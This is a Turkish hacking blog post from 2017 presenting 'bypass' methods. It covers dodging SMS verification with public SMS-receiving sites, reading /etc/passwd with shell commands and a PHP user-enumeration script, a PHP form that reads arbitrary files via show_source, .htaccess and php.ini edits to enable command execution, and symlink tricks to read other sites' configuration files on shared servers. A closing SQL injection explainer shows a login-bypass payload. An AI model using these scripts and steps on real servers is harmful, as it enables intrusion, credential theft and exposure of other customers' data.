5 Şubat 2017 Pazar

-Bypass nedir -Doğrulama Kodu Bypass -SQL injection Bypass Anlatım -Bypass Metodları

Bi yere kayıt olurken bazen telefon onayı yani "doğrulama kodu" olmadan üye olamıyosunuz.
Bunu bu şekilde bypass edebilirsiniz.

# Kullanım # 

- Verdiğim Siteye girin
- Herhangi bi numaranın bayrağının üstüne tıklayın.
- O numaraya Gelen SMS’leri görüceksiniz.
- Sizin doğrulama kodunuz da 1 dakika içinde orda gözükecektir.




Site:
Receive SMS Online for FREE - UK,Romania,USA,Thailand,Spain,India




Bypass Metodları | RHT |

Web & Server Güvenliği






Merhaba arkadaşlar hackerların cok sıklıkla kullandığı basit bypass yöntemlerinden bahsedeceğiz bugun sizlere 
ilk olarak ilk kodumuz sudur : 

1)etc/passwd bypass:

Aşağıdaki komutlar ile passwd leri okuyabilirsiniz :

Kod:
 1)cat /etc/passwd
 2)cat -n /etc/passwd
 3)ln s etc/passwd 1.txt
 4)less /etc/passwd
 5)more /etc/passwd
Evet bu kod ile okuyabiliyorsak ne mutlu bize  ama bu kod gecersizse size 2 tane daha kod vereceğim onları deneyiniz ..
assagıda vereceğim kodları bir dosya oluşturup içine yazınız etc.php gibi 

1. Kodumuz 
Kod:
 <?php

 // //cat /etc/passwd
 for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
 $ara = posix_getpwuid($uid);
 if (!empty($ara)) {
 while (list ($key, $val) = each($ara)){
 print "$val:";
 }
 print "\n";
 }
 }
 ?>
Olmassa 
2. Kodumuz 

Kod:
 <font face="Times New Roman" size="4">Etc bypass</font><br />
 <form method="POST" action="">
 <p>
 <input type="text" name="passwd" size="20">
 <input type="submit" value="Get" name="B1">
 </p>
 </form>
 <?
 $sec = $_POST['passwd'];
 if ($sec){
 show_source ("$sec");
 }
 ?>
Yukarıdakiler otomatik yolla yapılanlardır simdi manuele geçelim .. 


"ln -s / root" komutu ile root klasörü yaratalım, içindeki kök dizinine girelim (cd root), sonra etc üyesi olalım (cd etc), ls komutu ile etc klasörünün içindekileri sıralayabiliriz bilərik.CgiTelnetdən "Downloand File" => file Name e passwd yada passwd.zip yazıp, kaydedin 

2) Config bypass:
Config çekmek için bir klasör yaratıp, sırası ile => öncelikle .htaccess kuralım, içine aşağıdaki kodları yazıp, save edelim:
Kod:
 Options FollowSymLinks MultiViews Indexes ExecCGI
 AddType application/x-httpd-cgi .pl
 AddHandler cgi-script .pl
 AddHandler cgi-script .pl
Safe mode on ise , php.ini yaratıp, içine bu kodları girelim:

Kod:
 safe_mod = OFF
 exec = ON
 shell_exec = ON
Ve size gereken config çekme script: Config reader(Anti-armenia-TheLock) - Pastebin.com
Skripte chmod = 755 verip, içine passwd-ları dahil edip, çəkin.Configlər yarattığımız klasöre upload edilecektir.
3) symlink bypass:
Sunucuda symlink adlı klasör yaratalım, klasöre girip "ln -s / r00t (root)" emri verək.Həmin klasöre root adlı yeni klasör oluşacak, şimdi bir sitenin config-ini okuyalım:
sayt.com/symlink/root/home/istifadəçi/public_html/config-faylı.php
Bunu okuyunca biz Yasak (403) hatası alacağıq.İndi ise sembolik bağ adlı klasöre .htaccess dosyası açıp, içine aşağıdaki kodları yazıp, save edelim:

Kod:
 Options all
 DirectoryIndex Sux.html
 AddType text/plain .php
 AddHandler server-parsed .php
 AddType text/plain .html
 AddHandler txt .html
 Require None
 Satisfy Any

Buna benzer diğer kodlar: ByPass codes - Pastebin.com
Bu sorunun tam çözümü yoktur, sunucunun güvenliğinden bağlıdır.




SQL injection Bypass Anlatımlarım.

Web & Server Güvenliği



SQL injection Bypass Anlatımlarım.


SQL Injection Nedir?
SQL Injection saldırganların veri çalma/değiştirmede kullandıkları web saldırı metodlarından biridir. Belkide günümüzde en çok kullanılan uygulama seviyesi tekniklerden biridir. Web uygulamasındaki güvensiz kodlamalardan yararlanarak login formu gibi kullanıcı girişlerinin SQL sorgusunda kullanıldığı yerlerde SQL komutları eklenmesi ile veritabanına yetkisiz erişim sağlar.

SQL Injection: Detaylı Açıklama
Web uygulamaları web sitesini ziyaret eden kullanıcıların web tarayıcıları ile bir veritabanından veri görüntüleyebilmelerini sağlarlar. Veritabanları çoğu web sitesinde kullanılır ve ziyaretçilere spesifik bilgilerin sunulması için veri depolama amaçlı kullanılırlar. Kullanıcı bilgiler, finansal ve ödeme bilgileri, firma istatistikleri bir veritabanında bulunabilir ve hazır veya özel yazılmış uygulamalar ile erişilebilirler.

SQL Injection, bir web uygulaması üzerinden arka plandaki veritabanında çalıştırılması için SQL komutlarının gönderilmesidir. Eğer web uygulamasında kullanıcı tarafından gelen tüm parametreler doğru olarak filtrelenmemişse saldırganlar tüm veritabanı içeriğini görebilir veya silebilirler.
Login sayfaları, destek veya ürün istek formlar, yorum/iletişim formları, arama sayfaları, alışveriş sepeti sayfaları dinamik içeriğin sunulduğu çeşitli sayfalardır ve modern iş dünyasında müşteriler ile veya kullanıcılar ile haberleşmede vazgeçilmezdir. 
Bu tip web siteleri SQL Injection saldırılarından etkileniyor olabilir.
SQL Injection: Basit bir örnek
Normal bir kullanıcının kendi kullanıcı adı ve şifre kombinasyonu ile giriş yaptığı bir login sayfası düşünün.

Normal kullanıcı bilgilerini gönderdiğinde bu bilgilerden bir SQL sorgusu yaratılarak doğrulama için veritabanına gönderilir. Eğer geçerli ise kullanıcının erişimine izin verilir. Diğer bir deyişle login sayfasını kontrol eden web uygulaması kullanıcı adı şifre kombinasyonunu doğrulamak için planlanmış komutları kullanarak veritabanı ile haberleşir. Doğrulandığında da kullanıcının erişimine izin verilir.

SQL Enjeksiyon ile saldırganlar login formu engelini aşarak arkasındakileri görmek için özel olarak hazırlanmış SQL komutları girerler. Bu sadece eğer kullanıcı tarafından sağlanan girişler doğru olarak filtrelenmiyor ve direk olarak SQL sorgusu ile veritabanına gönderiliyorsa mümkün olabiliyor. SQL Enjeksiyon açıkları saldırganların direk olarak veritabanı ile haberleşmesini sağlarlar.

Bu tip saldırılardan etkilenen teknolojiler ASP, ASP.NET, PHP, JSP ve CGI gibi dinamik script dilleridir. SQL Enjeksiyon saldırısı yapacak olan bir saldırganın tek ihtiyacı olan bir web tarayıcısı, SQL sorguları hakkında bilgidir. SQL Enjeksiyonun basitliği onu popüler yapan en büyük etken.
Nasıl olurda bir güvenlik duvarı veya diğer güvenlik mekanizması arkasındaki bir veritabanına direk olarak SQL sorguları geçer?
Güvenlik duvarları ve benzer saldırı tespit mekanizmaları tam ölçekli bir SQL enjeksiyon web saldırısına karşı çok az hatta bazen hiç koruma sağlamazlar.

Web sitenizin herkese açık olması gerektiği için güvenlik mekanizmaları web uygulamanıza erişime (genelde port 80/443) izin verecektir. Ve web uygulamasının istenilen bilgileri gösterebilmesi için veritabanına erişim yapabilmesi gerekir.
SQL veya Structured Query Language verileri bir veritabanına depolamanızı, değiştirmenizi ve çağırabilmenizi sağlar. SQL, gerçekten de, bir web uygulamasının (ve kullanıcıların) veritabanı ile etkileşebilmeleri için tek yoldur. Veritabanlarına örnek olarak Oracle, Microsoft Access, MS SQL Server, MySQL ve Filermaker Pro verilebilir.
SQL komutları arasında belli başlı olarak SELECT, INSERT, DELETE ve DROP TABLE sayılabilir. DROP TABLE kelime anlamı olarak da görüleceği gibi belirli isimdeki bir tablonun silinmesini sağlar.
Yukarıdaki login sayfası örneğinde normal bir senaryoda web uygulaması için planlanan SQL komutları aşağıdaki gibi olabilir:
SELECT count(*)
FROM kullanici_listesi_tablosu
WHERE kullanici='KULLANICI_ALANI'
AND sifre='SIFRE_ALANI'

Bu SQL komutu veritabanı sunucusunda depolanan bilgi ile kullanıcının girdiğini eşleştirmeyi dener.
Çoğu web uygulamasının içine veritabanı ile haberleşebilmesi ve fonksiyonlarını gerçekleştirebilmesi için belirli bazı SQL sorguları gömülür. Eğer web uygulamasının herhangi bir giriş alanı doğru olarak filtrelenmez ise, bir saldırgan ek SQL komutları enjekte ederek web uygulamasının çalıştıracağı SQL komutlarını artırabilir, böylece orjinal dizayn ve fonksiyonun ötesine geçer.
Böylece saldırganların veritabanı ile arasında temiz bir haberleşme kanalı kurulacaktır.



Veritabanım SQL Enjeksiyon'dan etkileniyormu?

SQL Enjeksiyon şu an Internet'te kullanılan en genel uygulama katmanı saldırılarından biridir. SQL Enjeksiyon saldırılarına karşı korunmak kolay olsa da halen bu açıktan etkilenen çok sayıda web uygulaması var.
Web Uygulama Güvenliği Konsorsiyum'una (WASC) göre 27 Temmuz 2006 tarihine kadar medyada rapor edilen hack olaylarının %9'u SQL Enjeksiyon saldırılarından kaynaklanmıştı. Araştırmalarımızdan elde ettiğimiz daha güncel veriler web sitelerinin %50'sinin SQL Injection saldırılarından etkilendiğini ortaya koydu.
Eğer programcı değilseniz veya web uygulamanızı siz kodlamadıysanız web sitenizin ve uygulamanızın SQL Enjeksiyondan etkilenip etkilenmediği sorusunu cevaplamak biraz zor olabilir.
Bir saldırganın veritabanında depolanmış olan verilerinizi görüp göremeyeceği web sitenizin nasıl kodlandığına bağlı. Kesin olan şey saldırganların etkilenen sistemlerde, sistemi ele geçirmek için veya bilgi edinmek için, istedikleri SQL komutlarını çalıştırabileceğidir.
Eğer düzgün kodlanmadıysa müşteri veya firma verilerinizin ele geçirilmesi riski söz konusudur.
Bir saldırganın nelere erişebileceği de veritabanında ayarlanmış olan güvenlik seviyesine bağlıdır. Veritabanı sadece belirli bazı komutların çalıştırılmasına izin veriyor olabilir. Normalde web uygulamaların ön yüzleri için sadece okuma izni verilir.
Saldırgan sistemde veya verilerde değişiklik yapamasada hala değerli bilgileri okuyabilir.


SQL Enjeksiyon'un etkileri nedir?

Bir saldırgan sistemin SQL Enjeksiyon saldırısından etkilendiğini tespit ettiğinde bir giriş alanından SQL sorgu ( komutlarını çalıştırmaya başlar. Bu veritabanınızı saldırganın eline verip istediği SQL komutlarını çalıştırmasına, istediği verileri silmesine ve değiştirebilmesine izin vermek gibidir.
Saldırganın istediği komutları çalıştırması veritabanı bütünlüğünün bozulmasına ve önemli bilgilerin görülmesi ile sonuçlanır. Arka planda kullanılan veritabanına bağlı olarak SQL enjeksiyon açıkları saldırgan için değişik seviyelerde veri/sistem erişimi sunar.
Bazı durumlarda dosyalardan okumak veya dosyalara yazmak, ya da işletim sisteminde komutlar çalıştırmak mümkün olabilir. Micorosft SQL sunucusu gibi bazı SQL sunucuları stored ve extended prosedürler (veritabanı sunucusu fonksiyonları) içerirler. Eğer bir saldırgan bu prosedürlere ulaşabilirse bu tam bir felaket olacaktır.
Maalesef SQL enjeksiyon etkileri sadece veri hırsızlığı veya hack sonrası farkediliyor.


Bir SQL Enjeksion saldırısı örneği

login ve şifre den oluşan iki giriş kabul eden basit bir HTML formunu inceleyelim:
<form method="post" action="http://testasp.acunetix.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

login.asp'nin en kolay çalışma şekli aşağıdaki gibi bir veritabanı sorgusu hazırlamakla olabilir:
SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’

Eğer $username ve $password değişkenleri kullanıcı girişinden direk olarak alınıp SQL sorgusunda kullanılıyorsa çok kolay bir şekilde hack edilebilir demektir. Kullanıcı adı olarak "Olympos" verdiğimizi ve şifre için de aşağıdakini yazdığımızı varsayalım:
falan' OR 'x'='x

SELECT id
FROM logins
WHERE username = 'Olympos'
AND password = 'falan' OR 'x'='x'

Web uygulamasında kullanıcı girişleri doğru olarak filtrelenmediği için, tek tırnak kullanımı WHERE sql komutunu iki-bileşenli bir sorguya dönüştürdü.
'x'='x' bölümü ilk bölüm ne olursa olsun şartın doğru olmasını garantiler.
Bu da saldırganın login form'unu geçerli bir kullanıcı / şifre kombinasyonu bilmesine gerek kalmadan aşabilmesini sağlar.

SQL Enjeksiyon saldırılarını nasıl engellerim?

Güvenlik duvarları ve benzer saldırı tespit mekanizmaları bu konuda tam bir koruma sağlamayabilir. Web sitenizin herkese açık olması gerektiği için güvenlik mekanizmaları web trafiğinin veritabanı sunucularınız ile web uygulaması aracılığı ile haberleşmesine izin verecektir. Zaten bunun için tasarlanmadılarmı?
Sunucularınızı, veritabanlarını, programlama dillerini ve işletim sistemlerinizi güncelleyip yamalarını geçmeniz kritik öneme sahip fakat SQL Enjeksiyon saldırılarını engellemede tam çözüm değildir.








Hiç yorum yok:

Yorum Gönder